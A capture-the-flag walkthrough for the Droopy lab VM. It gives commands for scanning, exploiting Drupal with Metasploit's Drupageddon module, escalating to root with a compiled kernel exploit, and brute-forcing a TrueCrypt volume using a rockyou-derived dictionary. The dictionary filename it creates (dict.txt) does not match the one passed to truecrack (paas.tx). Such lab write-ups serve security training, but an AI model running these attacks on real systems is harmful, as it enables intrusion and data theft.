Droopy CTF

Introduction

In this post, you will learn how to solve the Droopy CTF. This is a very easy challenge; stick with it till the end and I am sure you will be able to crack the box.

If you have any doubts, leave your question on the Discord server.

To download Droopy [Click here]

Aim

There is 1 flag in Droopy and we have to find it.

Hacking Phases in Droopy CTF

  • Finding target IP
  • Network Scanning (Nmap)
  • Identifying Drupal CMS
  • Exploiting Drupal CMS (Metasploit)
  • Privilege Escalation with Kernel Exploit
  • Uploading and Downloading dave.tc from /www/html
  • Generate a Dictionary with the help of rockyou.txt
  • Brute Force attack on Truecrypt Volume (Truecrack)
  • Decrypting File (Veracrypt)
  • Capture the Flag

Finding target IP

To find the target IP, run arp-scan -l or the netdiscover command.

Nmap scan

Run a full port scan with OS and service detection.

nmap -p- -A 192.168.1.4

Port 80 is open, so I opened the web browser to view the target.

Identifying Drupal CMS

Head to the target website to have a look at it.

http://192.168.1.4

The website is powered by Drupal, and there is an exploit available for Drupal CMS.

Exploiting Drupal CMS (Metasploit)

Open msfconsole

use exploit/multi/http/drupal_drupageddon
set rhost 192.168.1.4
exploit

Wait for the Meterpreter shell to open.

Privilege Escalation with Kernel Exploit

Open another terminal and type searchsploit 3.13.0

Copy the exploit at this path to your home directory: /usr/share/exploitdb/exploits/Linux/local/37292.c

Once you have saved it, go back to the Meterpreter shell and type:

cd /tmp

upload /home/osboxes/37292.c

Once the exploit is uploaded, enter:

shell

python -c 'import pty;pty.spawn("/bin/bash")'

gcc 37292.c -o shell

chmod 777 shell

./shell to execute the exploit

id

cd /root

ls

cp dave.tc /var/www/html

Uploading and Downloading dave.tc from /www/html

Now open a web browser and go to this URL on the target IP.

http://192.168.1.4/dave.tc

Now save the file dave.tc.

cd /var

ls

cd mail

ls

cd www-data

ls

cat www-data

Generate a Dictionary with the help of rockyou.txt

Generate a dictionary to crack the dave.tc file; the flag is hidden inside dave.tc.

cat rockyou.txt | grep academy > /root/Desktop/dict.txt
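
rockyou.txt contains bytes that are not valid UTF-8, so a plain grep can report "Binary file rockyou.txt matches" instead of printing the words. The script below is an added example, not part of the original walkthrough, that does the same filtering byte-safely; the function names and the sample wordlist are constructed for illustration.

```shell
#!/bin/sh
# Added example: hint-filtered dictionary. The wordlist written by
# make_sample is constructed sample data, not real rockyou.txt content.

# build_dict HINT WORDLIST OUT
# Writes each unique line of WORDLIST that contains HINT (any case) to OUT
# and prints how many candidates were kept.
build_dict() {
    hint=$1; wordlist=$2; out=$3
    # LC_ALL=C and -a make grep treat the file as raw bytes, so lines with
    # invalid UTF-8 are printed instead of "Binary file ... matches".
    # -F matches the hint literally, -i ignores case.
    # tr strips carriage returns left by Windows line endings, and
    # sort -u removes the duplicates that stripping can expose.
    LC_ALL=C grep -a -i -F -- "$hint" "$wordlist" | tr -d '\r' |
        LC_ALL=C sort -u > "$out"
    wc -l < "$out" | tr -d ' '
}

# make_sample FILE: write a small constructed wordlist. \351 is a lone
# Latin-1 byte (invalid UTF-8); one entry ends in CRLF.
make_sample() {
    printf 'password\nacademy\netonacademy\nAcademy1\n' > "$1"
    printf 'caf\351academy\nletmein\netonacademy\r\n123456\n' >> "$1"
}

# Demo: filter the sample and report how far the hint narrows the list.
tmp=$(mktemp -d)
make_sample "$tmp/wordlist.txt"
total=$(wc -l < "$tmp/wordlist.txt" | tr -d ' ')
kept=$(build_dict academy "$tmp/wordlist.txt" "$tmp/dict.txt")
echo "kept $kept of $total candidates"
rm -rf "$tmp"
```

The candidate count shows how much a single hint word shrinks the search space.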

Brute Force attack on Truecrypt Volume (Truecrack)

To crack the password:

truecrack --truecrypt /home/osboxes/Downloads/dave.tc -k SHA512 -w paas.tx

The password for the dave.tc file is etonacademy.

Decrypting File (Veracrypt)

To decrypt the file, we use VeraCrypt.

Once the file is decrypted, open it in a terminal.

Capture the Flag

ls -la

cd .secret

ls -la

cd .top

ls -la

cat flag.txt


By moulik